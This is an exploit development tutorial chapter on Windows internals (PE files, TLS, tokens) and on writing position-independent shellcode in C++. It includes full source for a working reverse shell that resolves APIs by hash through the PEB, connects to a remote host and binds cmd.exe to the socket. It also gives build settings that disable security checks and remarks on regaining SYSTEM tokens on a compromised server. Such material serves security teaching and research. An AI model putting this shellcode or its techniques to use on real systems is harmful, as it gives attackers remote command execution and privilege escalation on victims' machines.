Exploit Development Tutorial Series: Windows Basics & Shellcode


Source: http://expdev-kiuhnm.rhcloud.com/2015/05/11/contents/


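Windows Basics


0x00 Windows Basics

This article briefly covers some basics that Windows developers should know.

0x01 Win32 API

The main Windows API is provided by several DLLs (Dynamic Link Libraries). An application can import functions from those DLLs and call them. Because applications depend on this DLL interface rather than on kernel internals, ordinary user-mode applications remain portable.

0x02 PE File Format

Executables and DLLs are PE (Portable Executable) files. Each PE file contains an import table and an export table. The import table lists the imported functions and the files (modules) they come from. The export table lists the functions the file exports, i.e. the functions that other PE files can import.

PE files consist of several sections (code, data, and so on). The .reloc section holds the information needed to relocate the executable or DLL in memory. Although some addresses in the code are relative (for example those of relative jmp instructions), most are absolute and depend on where the module is loaded.

The Windows loader searches for DLLs starting from the current working directory, so an application can ship a DLL that differs from the one in the system directory (\windows\system32). The resulting versioning (incompatibility) problem is what some people call DLL hell.

It is important to understand the concept of a Relative Virtual Address (RVA). PE files use RVAs to specify positions relative to the base address of the module. In other words, if a module is loaded at address B (the base address) and an element has RVA X within that module, then the element's Virtual Address (VA) is B + X.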
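The relation VA = B + X can be written down as a tiny helper. This is only an illustrative sketch in Python 3; the function names rva_to_va and va_to_rva are made up for this example and are not part of any Windows API.

```python
def rva_to_va(base: int, rva: int) -> int:
    """Return the virtual address of an element, given the module base and its RVA."""
    return base + rva


def va_to_rva(base: int, va: int) -> int:
    """Inverse conversion: recover the RVA from a virtual address inside the module."""
    if va < base:
        raise ValueError("address lies below the module base")
    return va - base


# A module loaded at 400000h with an element at RVA 100h.
print(hex(rva_to_va(0x400000, 0x100)))      # 0x400100
print(hex(va_to_rva(0x400000, 0x400100)))   # 0x100
```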

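0x03 Threads

If you are used to Windows, threads will be familiar. If you come from Linux, keep in mind that Windows assigns CPU time slices to threads. You can create a new process with CreateProcess() and a new thread with CreateThread(). Threads run within the address space of their process, so they share memory.

Threads also have limited support for non-shared memory through a mechanism called TLS (Thread Local Storage).

Basically, the TEB of each thread contains a main TLS array of 64 DWORDs, plus an additional TLS array of up to 1024 DWORDs that is allocated when the main array runs out of free slots. An index into one of the two arrays must first be allocated with TlsAlloc(); the DWORD at that index can then be read with TlsGetValue(index) and written with TlsSetValue(index, newValue). For example, TlsGetValue(7) reads the DWORD at index 7 of the TLS array in the TEB of the current thread.

Note: the same mechanism could be emulated with GetCurrentThreadId(), but it would not work as well.

0x04 Tokens

Tokens are commonly used to describe access rights. Like a file handle, a token is just a 32-bit integer. Each process maintains an internal structure that holds the access-rights information associated with its tokens.

There are two types of tokens: primary tokens and impersonation tokens. Whenever a process is created, it is assigned a primary token. Each thread of that process can use the process token or obtain an impersonation token from another process. LogonUser(), which is given credentials, may return an impersonation token (for example with the LOGON32_LOGON_NETWORK logon type); such a token cannot be passed to CreateProcessAsUser() unless you first convert it to a primary token by calling DuplicateTokenEx().

SetThreadToken(newToken) attaches a token to the current thread, and RevertToSelf() removes it, so that the thread reverts to the primary token.

Consider a user who connects to a server on Windows and sends a username and password. The server, running as SYSTEM, calls LogonUser() with the supplied credentials and, on success, receives a new token. The server then creates a new thread, and that thread calls SetThreadToken(new_token), where new_token is the token returned by LogonUser(). From then on the thread runs with the same privileges as the user. When the thread has finished serving the client, it is either destroyed or it calls RevertToSelf() and is added to the pool of free threads.

If you gain control of the server, you can restore the original privileges of the current thread, i.e. SYSTEM, by calling RevertToSelf(), or you can look for other tokens in memory and attach them to the current thread with SetThreadToken().

Note that CreateProcess() uses the primary token as the token of the new process. This is a problem when the thread calling CreateProcess() holds an impersonation token with more privileges than the primary token: the new process ends up with fewer privileges than the thread that created it.

The solution is to create a new primary token from the impersonation token of the current thread with DuplicateTokenEx(), and then create the new process by calling CreateProcessAsUser() with that new primary token.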

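Shellcode


0x00 Introduction

Shellcode is a piece of code that an exploit sends as its payload; it is injected into the vulnerable application and executed. Shellcode must be self-contained and should contain no null bytes: it is often copied with functions such as strcpy(), which stop copying at the first null byte, so a shellcode containing one would be copied only partially. Shellcode is normally written directly in assembly, but in this article we develop it in C/C++ with Visual Studio 2013. The advantages of this approach are:

1. Shorter development time.

2. IntelliSense.

3. Easy debugging.

We will use VS 2013 to produce an executable containing the shellcode, and a Python script to extract the shellcode and fix it (i.e. remove the null bytes).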
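The null-byte constraint mentioned in the introduction can be illustrated with a few lines of Python 3. The helper c_strcpy below is a hypothetical stand-in for the behaviour of strcpy(), not a real API, and the sample bytes are the machine code of a mov instruction that stores 0Ch at an absolute address.

```python
def c_strcpy(src: bytes) -> bytes:
    """Mimic strcpy(): copy bytes up to, but not including, the first null byte."""
    end = src.find(b"\x00")
    return src if end == -1 else src[:end]


# mov dword ptr ds:[8E9130h],0Ch  ->  C7 05 30 91 8E 00 0C 00 00 00
payload = bytes([0xC7, 0x05, 0x30, 0x91, 0x8E, 0x00, 0x0C, 0x00, 0x00, 0x00])
copied = c_strcpy(payload)

# Only the bytes before the first 00 survive the copy.
print(len(payload), len(copied))  # 10 5
```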

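0x01 C/C++ Code

Use only stack variables

To write position-independent code we must use only stack variables. This means we cannot write

char *v = new char[100];

because that array would be allocated on the heap. The code would also try to call the new operator from msvcr120.dll through an absolute address:

00191000 6A 64                push        64h
00191002 FF 15 90 20 19 00    call        dword ptr ds:[192090h]

Address 192090h holds the address of the function. To call a function imported from a library, we have to do so directly, without relying on the import table and the Windows loader. Another problem is that the new operator probably requires some initialization performed by the C/C++ runtime.

We cannot use global variables either:

int x;

int main() {
  x = 12;
}

The code above (if not optimized away) produces:

008E1C7E C7 05 30 91 8E 00 0C 00 00 00 mov         dword ptr ds:[8E9130h],0Ch

where 8E9130h is the absolute address of the variable x.

Strings are also a problem. If we write

char str[] = "I'm a string";
printf(str);

the string is placed in the .rdata section of the executable and referenced by its absolute address.

Do not use printf in shellcode: it appears here only to show how str is referenced.

Here is the asm code:

00A71006 8D 45 F0             lea         eax,[str]
00A71009 56                   push        esi
00A7100A 57                   push        edi
00A7100B BE 00 21 A7 00       mov         esi,0A72100h
00A71010 8D 7D F0             lea         edi,[str]
00A71013 50                   push        eax
00A71014 A5                   movs        dword ptr es:[edi],dword ptr [esi]
00A71015 A5                   movs        dword ptr es:[edi],dword ptr [esi]
00A71016 A5                   movs        dword ptr es:[edi],dword ptr [esi]
00A71017 A4                   movs        byte ptr es:[edi],byte ptr [esi]
00A71018 FF 15 90 20 A7 00    call        dword ptr ds:[0A72090h]

As you can see, the string lives in the .rdata section at address A72100h and is copied onto the stack (str points to the stack) by movsd and movsb instructions. Note that A72100h is an absolute address, so this code is clearly not position independent.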

If we write

char *str = "I'm a string";
printf(str);

the string is still placed in the .rdata section, but it is not copied onto the stack:

00A31000 68 00 21 A3 00       push        0A32100h
00A31005 FF 15 90 20 A3 00    call        dword ptr ds:[0A32090h]

The string is in the .rdata section at absolute address A32100h.

How can we make this code position independent?

The simpler (partial) solution:

char str[] = { 'I', '\'', 'm', ' ', 'a', ' ', 's', 't', 'r', 'i', 'n', 'g', '\0' };
printf(str);

The corresponding assembly code is:

012E1006 8D 45 F0             lea         eax,[str]
012E1009 C7 45 F0 49 27 6D 20 mov         dword ptr [str],206D2749h
012E1010 50                   push        eax
012E1011 C7 45 F4 61 20 73 74 mov         dword ptr [ebp-0Ch],74732061h
012E1018 C7 45 F8 72 69 6E 67 mov         dword ptr [ebp-8],676E6972h
012E101F C6 45 FC 00          mov         byte ptr [ebp-4],0
012E1023 FF 15 90 20 2E 01    call        dword ptr ds:[12E2090h]

Apart from the call to printf, this code is position independent because the pieces of the string are encoded directly in the source operands of the mov instructions. Once the string has been built on the stack, it can be used.
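To see where the immediates 206D2749h, 74732061h and 676E6972h come from, the string can be split into little-endian dwords by hand. The following Python 3 sketch does exactly that; the function name string_to_mov_immediates is invented for this illustration.

```python
import struct


def string_to_mov_immediates(s: bytes):
    """Split a null-terminated string into little-endian dwords plus a byte tail."""
    data = s + b"\x00"                       # the compiler stores the terminator too
    full = len(data) - len(data) % 4         # length covered by whole dwords
    dwords = [struct.unpack_from("<I", data, i)[0] for i in range(0, full, 4)]
    tail = data[full:]                       # leftover bytes, stored with smaller movs
    return dwords, tail


dwords, tail = string_to_mov_immediates(b"I'm a string")
print([hex(d) for d in dwords])  # ['0x206d2749', '0x74732061', '0x676e6972']
print(tail)                      # b'\x00'
```

The three dwords match the operands of the three mov dword instructions in the listing, and the one-byte tail corresponds to mov byte ptr [ebp-4],0.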

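Unfortunately, this approach breaks down once the string is long enough. The code

char str[] = { 'I', '\'', 'm', ' ', 'a', ' ', 'v', 'e', 'r', 'y', ' ', 'l', 'o', 'n', 'g', ' ', 's', 't', 'r', 'i', 'n', 'g', '\0' };
printf(str);

produces

013E1006 66 0F 6F 05 00 21 3E 01 movdqa      xmm0,xmmword ptr ds:[13E2100h]
013E100E 8D 45 E8             lea         eax,[str]
013E1011 50                   push        eax
013E1012 F3 0F 7F 45 E8       movdqu      xmmword ptr [str],xmm0
013E1017 C7 45 F8 73 74 72 69 mov         dword ptr [ebp-8],69727473h
013E101E 66 C7 45 FC 6E 67    mov         word ptr [ebp-4],676Eh
013E1024 C6 45 FE 00          mov         byte ptr [ebp-2],0
013E1028 FF 15 90 20 3E 01    call        dword ptr ds:[13E2090h]

As you can see, part of the string is placed in the .rdata section at address 13E2100h, while the rest is encoded in the source operands of mov instructions as before.

The solution I came up with is to allow code like

char *str = "I'm a very long string";

and to fix the shellcode with a Python script. The script has to extract the referenced strings from the .rdata section, put them into the shellcode, and fix the relocations. We will see how shortly.

Do not call the Windows API directly

In our C/C++ code we cannot write

WaitForSingleObject(procInfo.hProcess, INFINITE);

because WaitForSingleObject is a function imported from kernel32.dll.

In a nutshell, a PE file contains an import table and an Import Address Table (IAT). The import table holds information about which functions to import from which libraries. The IAT is filled in by the Windows loader when the executable is loaded and contains the addresses of the imported functions. The code of the executable calls the imported functions through a level of indirection. For example:

001D100B FF 15 94 20 1D 00    call        dword ptr ds:[1D2094h]

Address 1D2094h is the location of the IAT entry that holds the address of MessageBoxA. This indirection is useful because the call above does not need to be fixed (unless the executable is relocated). The only thing the Windows loader has to fix is the dword at 1D2094h, which is the address of MessageBoxA.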
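The absolute IAT address is visible in the instruction bytes themselves, which is why such a call cannot appear in position-independent code. The Python 3 sketch below decodes the operand of an FF 15 indirect call; decode_indirect_call is a hypothetical helper written for this example and handles only this one encoding.

```python
import struct


def decode_indirect_call(code: bytes) -> int:
    """Return the absolute address operand of `call dword ptr ds:[imm32]` (FF 15 imm32)."""
    if len(code) < 6 or code[0] != 0xFF or code[1] != 0x15:
        raise ValueError("not an FF 15 indirect call")
    (slot,) = struct.unpack_from("<I", code, 2)   # little-endian address of the IAT slot
    return slot


# Bytes taken from the listing above: FF 15 94 20 1D 00
print(hex(decode_indirect_call(bytes.fromhex("FF1594201D00"))))  # 0x1d2094
```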

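The solution is to obtain the addresses of Windows functions directly from the in-memory data structures of Windows. We will see how later.

Creating a new project

Go to File→New→Project…, select Installed→Templates→Visual C++→Win32→Win32 Console Application, choose a name for the project (I named it shellcode), and click OK.

Go to Project→<project name> properties and a new dialog appears. Apply the changes to all configurations (Release and Debug) by setting Configuration (top left of the dialog) to All Configurations. Then expand Configuration Properties and, under General, change Platform Toolset to Visual C++ Compiler Nov 2013 CTP (CTP_Nov2013).

This lets you use some features of C++11 and C++14, such as static_assert.

Shellcode example

Here is the code for a simple reverse shell (definition). Add a file named shellcode.cpp to the project and copy this code into it. Do not try to understand all of it right now; we will discuss it in detail later.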

// Simple reverse shell shellcode by Massimiliano Tomassoli (2015)
// NOTE: Compiled on Visual Studio 2013 + "Visual C++ Compiler November 2013 CTP".

#include <WinSock2.h>               // must precede #include <windows.h>
#include <WS2tcpip.h>
#include <windows.h>
#include <winnt.h>
#include <winternl.h>
#include <stddef.h>
#include <stdio.h>

#define htons(A) ((((WORD)(A) & 0xff00) >> 8) | (((WORD)(A) & 0x00ff) << 8))

_inline PEB *getPEB() {
    PEB *p;
    __asm {
        mov     eax, fs:[30h]
        mov     p, eax
    }
    return p;
}

DWORD getHash(const char *str) {
    DWORD h = 0;
    while (*str) {
        h = (h >> 13) | (h << (32 - 13));       // ROR h, 13
        h += *str >= 'a' ? *str - 32 : *str;    // convert the character to uppercase
        str++;
    }
    return h;
}

DWORD getFunctionHash(const char *moduleName, const char *functionName) {
    return getHash(moduleName) + getHash(functionName);
}

LDR_DATA_TABLE_ENTRY *getDataTableEntry(const LIST_ENTRY *ptr) {
    int list_entry_offset = offsetof(LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
    return (LDR_DATA_TABLE_ENTRY *)((BYTE *)ptr - list_entry_offset);
}

// NOTE: This function doesn't work with forwarders. For instance, kernel32.ExitThread forwards to
//       ntdll.RtlExitUserThread. The solution is to follow the forwards manually.
PVOID getProcAddrByHash(DWORD hash) {
    PEB *peb = getPEB();
    LIST_ENTRY *first = peb->Ldr->InMemoryOrderModuleList.Flink;
    LIST_ENTRY *ptr = first;
    do {                            // for each module
        LDR_DATA_TABLE_ENTRY *dte = getDataTableEntry(ptr);
        ptr = ptr->Flink;

        BYTE *baseAddress = (BYTE *)dte->DllBase;
        if (!baseAddress)           // invalid module(???)
            continue;
        IMAGE_DOS_HEADER *dosHeader = (IMAGE_DOS_HEADER *)baseAddress;
        IMAGE_NT_HEADERS *ntHeaders = (IMAGE_NT_HEADERS *)(baseAddress + dosHeader->e_lfanew);
        DWORD iedRVA = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
        if (!iedRVA)                // Export Directory not present
            continue;
        IMAGE_EXPORT_DIRECTORY *ied = (IMAGE_EXPORT_DIRECTORY *)(baseAddress + iedRVA);
        char *moduleName = (char *)(baseAddress + ied->Name);
        DWORD moduleHash = getHash(moduleName);

        // The arrays pointed to by AddressOfNames and AddressOfNameOrdinals run in parallel, i.e. the i-th
        // element of both arrays refer to the same function. The first array specifies the name whereas
        // the second the ordinal. This ordinal can then be used as an index in the array pointed to by
        // AddressOfFunctions to find the entry point of the function.
        DWORD *nameRVAs = (DWORD *)(baseAddress + ied->AddressOfNames);
        for (DWORD i = 0; i < ied->NumberOfNames; ++i) {
            char *functionName = (char *)(baseAddress + nameRVAs[i]);
            if (hash == moduleHash + getHash(functionName)) {
                WORD ordinal = ((WORD *)(baseAddress + ied->AddressOfNameOrdinals))[i];
                DWORD functionRVA = ((DWORD *)(baseAddress + ied->AddressOfFunctions))[ordinal];
                return baseAddress + functionRVA;
            }
        }
    } while (ptr != first);

    return NULL;            // address not found
}

#define HASH_LoadLibraryA           0xf8b7108d
#define HASH_WSAStartup             0x2ddcd540
#define HASH_WSACleanup             0x0b9d13bc
#define HASH_WSASocketA             0x9fd4f16f
#define HASH_WSAConnect             0xa50da182
#define HASH_CreateProcessA         0x231cbe70
#define HASH_inet_ntoa              0x1b73fed1
#define HASH_inet_addr              0x011bfae2
#define HASH_getaddrinfo            0xdc2953c9
#define HASH_getnameinfo            0x5c1c856e
#define HASH_ExitThread             0x4b3153e0
#define HASH_WaitForSingleObject    0xca8e9498

#define DefineFuncPtr(name)     decltype(name) *My_##name = (decltype(name) *)getProcAddrByHash(HASH_##name)

int entryPoint() {
//  printf("0x%08x\n", getFunctionHash("kernel32.dll", "WaitForSingleObject"));
//  return 0;

    // NOTE: we should call WSACleanup() and freeaddrinfo() (after getaddrinfo()), but
    //       they're not strictly needed.

    DefineFuncPtr(LoadLibraryA);

    My_LoadLibraryA("ws2_32.dll");

    DefineFuncPtr(WSAStartup);
    DefineFuncPtr(WSASocketA);
    DefineFuncPtr(WSAConnect);
    DefineFuncPtr(CreateProcessA);
    DefineFuncPtr(inet_ntoa);
    DefineFuncPtr(inet_addr);
    DefineFuncPtr(getaddrinfo);
    DefineFuncPtr(getnameinfo);
    DefineFuncPtr(ExitThread);
    DefineFuncPtr(WaitForSingleObject);

    const char *hostName = "127.0.0.1";
    const int hostPort = 123;

    WSADATA wsaData;

    if (My_WSAStartup(MAKEWORD(2, 2), &wsaData))
        goto __end;         // error
    SOCKET sock = My_WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
    if (sock == INVALID_SOCKET)
        goto __end;

    addrinfo *result;
    if (My_getaddrinfo(hostName, NULL, NULL, &result))
        goto __end;
    char ip_addr[16];
    My_getnameinfo(result->ai_addr, result->ai_addrlen, ip_addr, sizeof(ip_addr), NULL, 0, NI_NUMERICHOST);

    SOCKADDR_IN remoteAddr;
    remoteAddr.sin_family = AF_INET;
    remoteAddr.sin_port = htons(hostPort);
    remoteAddr.sin_addr.s_addr = My_inet_addr(ip_addr);

    if (My_WSAConnect(sock, (SOCKADDR *)&remoteAddr, sizeof(remoteAddr), NULL, NULL, NULL, NULL))
        goto __end;

    STARTUPINFOA sInfo;
    PROCESS_INFORMATION procInfo;
    SecureZeroMemory(&sInfo, sizeof(sInfo));        // avoids a call to _memset
    sInfo.cb = sizeof(sInfo);
    sInfo.dwFlags = STARTF_USESTDHANDLES;
    sInfo.hStdInput = sInfo.hStdOutput = sInfo.hStdError = (HANDLE)sock;
    My_CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &sInfo, &procInfo);

    // Waits for the process to finish.
    My_WaitForSingleObject(procInfo.hProcess, INFINITE);

__end:
    My_ExitThread(0);

    return 0;
}

int main() {
    return entryPoint();
}

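Compiler configuration

Go to Project→<project name> properties, expand Configuration Properties, then select C/C++. Apply the changes to the Release configuration.

Here are the settings you need to change:

  • General:
    • SDL Checks: No (/sdl-)

This is probably not needed, but I turned it off anyway.

  • Optimization:
    • Optimization: Minimize Size (/O1)

This is very important! We want the shellcode to be as small as possible.

    • Inline Function Expansion: Only __inline (/Ob1)

This tells VS 2013 to inline only functions defined with _inline. main() just calls entryPoint, the function of the shellcode. If entryPoint is short, it might get inlined into main(). That would be disastrous, because main() would no longer mark the end of the shellcode (it would in fact contain part of it). We will see why later.

    • Enable Intrinsic Functions: Yes (/Oi)

I don't know whether this setting should be turned off.

    • Favor Size Or Speed: Favor small code (/Os)
    • Whole Program Optimization: Yes (/GL)
  • Code Generation:
    • Security Check: Disable Security Check (/GS-)

We don't need any security checks!

    • Enable Function-Level linking: Yes (/Gy)

Linker configuration

Go to Project→<project name> properties, expand Configuration Properties, then select Linker. Apply the changes to the Release configuration. Here are the relevant settings you need to change:

  • General:
    • Enable Incremental Linking: No (/INCREMENTAL:NO)
  • Debugging:
    • Generate Map File: Yes (/MAP)

This tells the linker to generate a map file describing the structure of the EXE.

    • Map File Name: mapfile

This is the name of the map file. Choose whatever name you like.

  • Optimization:
    • References: Yes (/OPT:REF)

This option is very important for producing small shellcode because it eliminates functions and data that are never referenced by the code.

    • Enable COMDAT Folding: Yes (/OPT:ICF)
    • Function Order: function_order.txt

This setting reads a file named function_order.txt, which specifies the order in which functions must appear in the code section. We want entryPoint to be the first function in the code section, so function_order.txt contains a single line with the string ?entryPoint@@YAHXZ. You can find the (decorated) names of the functions in the map file.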

getProcAddrByHash

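This function returns the address of a function exported by a module (.exe or .dll) present in memory, given the hash associated with the module and the function. It would certainly be possible to look functions up by name, but that wastes space because the names would have to be included in the shellcode, whereas a hash is only 4 bytes. Since we do not use two hashes (one for the module and one for the function), getProcAddrByHash has to consider all the modules loaded in memory.

The hash for MessageBoxA, exported by user32.dll, can be computed as follows:

DWORD hash = getFunctionHash("user32.dll", "MessageBoxA");

where hash is the sum of getHash("user32.dll") and getHash("MessageBoxA"). The implementation of getHash is very simple:

DWORD getHash(const char *str) {
    DWORD h = 0;
    while (*str) {
        h = (h >> 13) | (h << (32 - 13));       // ROR h, 13
        h += *str >= 'a' ? *str - 32 : *str;    // convert the character to uppercase
        str++;
    }
    return h;
}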
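For experimenting outside the compiler, getHash can be ported to Python 3. This is a sketch that assumes ASCII input and emulates the 32-bit wrap-around of DWORD arithmetic with a mask; the snake_case names are chosen for this example.

```python
MASK32 = 0xFFFFFFFF


def get_hash(s: str) -> int:
    """Python port of getHash: rotate right by 13, then add the uppercased character."""
    h = 0
    for ch in s.encode("ascii"):
        h = ((h >> 13) | (h << (32 - 13))) & MASK32        # ROR h, 13
        h = (h + (ch - 32 if ch >= ord("a") else ch)) & MASK32
    return h


def get_function_hash(module_name: str, function_name: str) -> int:
    """Sum of the module hash and the function hash, truncated to 32 bits."""
    return (get_hash(module_name) + get_hash(function_name)) & MASK32


print(hex(get_hash("AB")))                                   # 0x2080042
print(get_hash("kernel32.dll") == get_hash("KERNEL32.DLL"))  # True
```

Values such as get_function_hash("kernel32.dll", "WaitForSingleObject") can be compared against the HASH_ constants in the C++ listing to check that the port behaves like the original.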

As you can see, the hash is case-insensitive. This matters because in some versions of Windows the names in memory are all uppercase. First, getProcAddrByHash goes through the TEB (Thread Environment Block) to get the address of the PEB:

PEB *peb = getPEB();

where

_inline PEB *getPEB() {
    PEB *p;
    __asm {
        mov     eax, fs:[30h]
        mov     p, eax
    }
    return p;
}

The selector fs is associated with a segment that starts at the address of the TEB. At offset 30h the TEB contains a pointer to the PEB (Process Environment Block). We can see this in WinDbg:

0:000> dt _TEB @$teb
ntdll!_TEB
   +0x000 NtTib            : _NT_TIB
   +0x01c EnvironmentPointer : (null)
   +0x020 ClientId         : _CLIENT_ID
   +0x028 ActiveRpcHandle  : (null)
   +0x02c ThreadLocalStoragePointer : 0x7efdd02c Void
   +0x030 ProcessEnvironmentBlock : 0x7efde000 _PEB
   +0x034 LastErrorValue   : 0
   +0x038 CountOfOwnedCriticalSections : 0
   +0x03c CsrClientThread  : (null)
   <snip>

The PEB is associated with the current process and contains, among other things, information about the modules loaded into the process address space. Here is getProcAddrByHash again:

PVOID getProcAddrByHash(DWORD hash) {
    PEB *peb = getPEB();
    LIST_ENTRY *first = peb->Ldr->InMemoryOrderModuleList.Flink;
    LIST_ENTRY *ptr = first;
    do {                            // for each module
        LDR_DATA_TABLE_ENTRY *dte = getDataTableEntry(ptr);
        ptr = ptr->Flink;
        .
        .
        .
    } while (ptr != first);

    return NULL;            // address not found
}

Here is part of the PEB:

0:000> dt _PEB @$peb
ntdll!_PEB
   +0x000 InheritedAddressSpace : 0 ''
   +0x001 ReadImageFileExecOptions : 0 ''
   +0x002 BeingDebugged    : 0x1 ''
   +0x003 BitField         : 0x8 ''
   +0x003 ImageUsesLargePages : 0y0
   +0x003 IsProtectedProcess : 0y0
   +0x003 IsLegacyProcess  : 0y0
   +0x003 IsImageDynamicallyRelocated : 0y1
   +0x003 SkipPatchingUser32Forwarders : 0y0
   +0x003 SpareBits        : 0y000
   +0x004 Mutant           : 0xffffffff Void
   +0x008 ImageBaseAddress : 0x00060000 Void
   +0x00c Ldr              : 0x76fd0200 _PEB_LDR_DATA
   +0x010 ProcessParameters : 0x00681718 _RTL_USER_PROCESS_PARAMETERS
   +0x014 SubSystemData    : (null)
   +0x018 ProcessHeap      : 0x00680000 Void
   <snip>

At offset 0Ch there is a field called Ldr, which points to a PEB_LDR_DATA structure. Let's look at it in WinDbg:

0:000> dt _PEB_LDR_DATA 0x76fd0200
ntdll!_PEB_LDR_DATA
   +0x000 Length           : 0x30
   +0x004 Initialized      : 0x1 ''
   +0x008 SsHandle         : (null)
   +0x00c InLoadOrderModuleList : _LIST_ENTRY [ 0x683080 - 0x6862c0 ]
   +0x014 InMemoryOrderModuleList : _LIST_ENTRY [ 0x683088 - 0x6862c8 ]
   +0x01c InInitializationOrderModuleList : _LIST_ENTRY [ 0x683120 - 0x6862d0 ]
   +0x024 EntryInProgress  : (null)
   +0x028 ShutdownInProgress : 0 ''
   +0x02c ShutdownThreadId : (null)

InMemoryOrderModuleList is a doubly linked list of LDR_DATA_TABLE_ENTRY structures, one for each module loaded in the address space of the current process. More precisely, InMemoryOrderModuleList is a LIST_ENTRY, which has two fields:

0:000> dt _LIST_ENTRY
ntdll!_LIST_ENTRY
   +0x000 Flink            : Ptr32 _LIST_ENTRY
   +0x004 Blink            : Ptr32 _LIST_ENTRY

Flink is the forward link and Blink the backward link. Flink points to the LDR_DATA_TABLE_ENTRY of the first module. Well, not exactly: Flink points to a LIST_ENTRY structure contained inside the LDR_DATA_TABLE_ENTRY structure.

Let's see how LDR_DATA_TABLE_ENTRY is defined:

0:000> dt _LDR_DATA_TABLE_ENTRY
ntdll!_LDR_DATA_TABLE_ENTRY
   +0x000 InLoadOrderLinks : _LIST_ENTRY
   +0x008 InMemoryOrderLinks : _LIST_ENTRY
   +0x010 InInitializationOrderLinks : _LIST_ENTRY
   +0x018 DllBase          : Ptr32 Void
   +0x01c EntryPoint       : Ptr32 Void
   +0x020 SizeOfImage      : Uint4B
   +0x024 FullDllName      : _UNICODE_STRING
   +0x02c BaseDllName      : _UNICODE_STRING
   +0x034 Flags            : Uint4B
   +0x038 LoadCount        : Uint2B
   +0x03a TlsIndex         : Uint2B
   +0x03c HashLinks        : _LIST_ENTRY
   +0x03c SectionPointer   : Ptr32 Void
   +0x040 CheckSum         : Uint4B
   +0x044 TimeDateStamp    : Uint4B
   +0x044 LoadedImports    : Ptr32 Void
   +0x048 EntryPointActivationContext : Ptr32 _ACTIVATION_CONTEXT
   +0x04c PatchInformation : Ptr32 Void
   +0x050 ForwarderLinks   : _LIST_ENTRY
   +0x058 ServiceTagLinks  : _LIST_ENTRY
   +0x060 StaticLinks      : _LIST_ENTRY
   +0x068 ContextInformation : Ptr32 Void
   +0x06c OriginalBase     : Uint4B
   +0x070 LoadTime         : _LARGE_INTEGER

InMemoryOrderModuleList.Flink points to _LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks, which is at offset 8, so we must subtract 8 to get the address of the _LDR_DATA_TABLE_ENTRY.
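The "subtract the field offset" step is the same arithmetic that getDataTableEntry performs with offsetof. It can be reproduced in Python 3 with ctypes by declaring only the first few fields of the 32-bit layout. The class names LIST_ENTRY32 and LDR_DATA_TABLE_ENTRY32 are invented for this sketch, and pointers are modelled as c_uint32 so that the offsets match the 32-bit WinDbg listing on any host.

```python
import ctypes


class LIST_ENTRY32(ctypes.Structure):
    # Two 32-bit pointers, modelled as plain integers.
    _fields_ = [("Flink", ctypes.c_uint32), ("Blink", ctypes.c_uint32)]


class LDR_DATA_TABLE_ENTRY32(ctypes.Structure):
    # Only the leading fields are needed to compute the offsets used here.
    _fields_ = [
        ("InLoadOrderLinks", LIST_ENTRY32),
        ("InMemoryOrderLinks", LIST_ENTRY32),
        ("InInitializationOrderLinks", LIST_ENTRY32),
        ("DllBase", ctypes.c_uint32),
    ]


def entry_from_memory_order_link(link_address: int) -> int:
    """Turn a pointer to InMemoryOrderLinks into a pointer to the enclosing entry."""
    return link_address - LDR_DATA_TABLE_ENTRY32.InMemoryOrderLinks.offset


print(hex(LDR_DATA_TABLE_ENTRY32.InMemoryOrderLinks.offset))  # 0x8
print(hex(LDR_DATA_TABLE_ENTRY32.DllBase.offset))             # 0x18
print(hex(entry_from_memory_order_link(0x683088)))            # 0x683080
```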

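First, get the Flink pointer of InMemoryOrderModuleList:

+0x014 InMemoryOrderModuleList : _LIST_ENTRY [ 0x683088 - 0x6862c8 ]

Its value is 0x683088, so the _LDR_DATA_TABLE_ENTRY structure is at address 0x683088 - 8 = 0x683080. Note that the dump below was taken at 0x683078 instead (8 subtracted from the InLoadOrderModuleList pointer 0x683080), so every value in it is displayed 8 bytes further down than the field it belongs to: the real DllBase, 0x60000, which matches ImageBaseAddress in the PEB, appears under SizeOfImage, and the full path appears under BaseDllName.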

0:000> dt _LDR_DATA_TABLE_ENTRY 683078
ntdll!_LDR_DATA_TABLE_ENTRY
   +0x000 InLoadOrderLinks : _LIST_ENTRY [ 0x359469e5 - 0x1800eeb1 ]
   +0x008 InMemoryOrderLinks : _LIST_ENTRY [ 0x683110 - 0x76fd020c ]
   +0x010 InInitializationOrderLinks : _LIST_ENTRY [ 0x683118 - 0x76fd0214 ]
   +0x018 DllBase          : (null)
   +0x01c EntryPoint       : (null)
   +0x020 SizeOfImage      : 0x60000
   +0x024 FullDllName      : _UNICODE_STRING "蒮m쿟ᄍ엘ᆲ膪n???"
   +0x02c BaseDllName      : _UNICODE_STRING "C:\Windows\SysWOW64\calc.exe"
   +0x034 Flags            : 0x120010
   +0x038 LoadCount        : 0x2034
   +0x03a TlsIndex         : 0x68
   +0x03c HashLinks        : _LIST_ENTRY [ 0x4000 - 0xffff ]
   +0x03c SectionPointer   : 0x00004000 Void
   +0x040 CheckSum         : 0xffff
   +0x044 TimeDateStamp    : 0x6841b4
   +0x044 LoadedImports    : 0x006841b4 Void
   +0x048 EntryPointActivationContext : 0x76fd4908 _ACTIVATION_CONTEXT
   +0x04c PatchInformation : 0x4ce7979d Void
   +0x050 ForwarderLinks   : _LIST_ENTRY [ 0x0 - 0x0 ]
   +0x058 ServiceTagLinks  : _LIST_ENTRY [ 0x6830d0 - 0x6830d0 ]
   +0x060 StaticLinks      : _LIST_ENTRY [ 0x6830d8 - 0x6830d8 ]
   +0x068 ContextInformation : 0x00686418 Void
   +0x06c OriginalBase     : 0x6851a8
   +0x070 LoadTime         : _LARGE_INTEGER 0x76f0c9d0

As you can see, I am debugging calc.exe in WinDbg! That's right: the first module is the executable itself. The important field is DllBase. Given the base address of a module, we can analyze the PE file loaded in memory and obtain all kinds of information, such as the addresses of the exported functions. That is what we do in getProcAddrByHash:

    BYTE *baseAddress = (BYTE *)dte->DllBase;
    if (!baseAddress)           // invalid module(???)
        continue;
    IMAGE_DOS_HEADER *dosHeader = (IMAGE_DOS_HEADER *)baseAddress;
    IMAGE_NT_HEADERS *ntHeaders = (IMAGE_NT_HEADERS *)(baseAddress + dosHeader->e_lfanew);
    DWORD iedRVA = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
    if (!iedRVA)                // Export Directory not present
        continue;
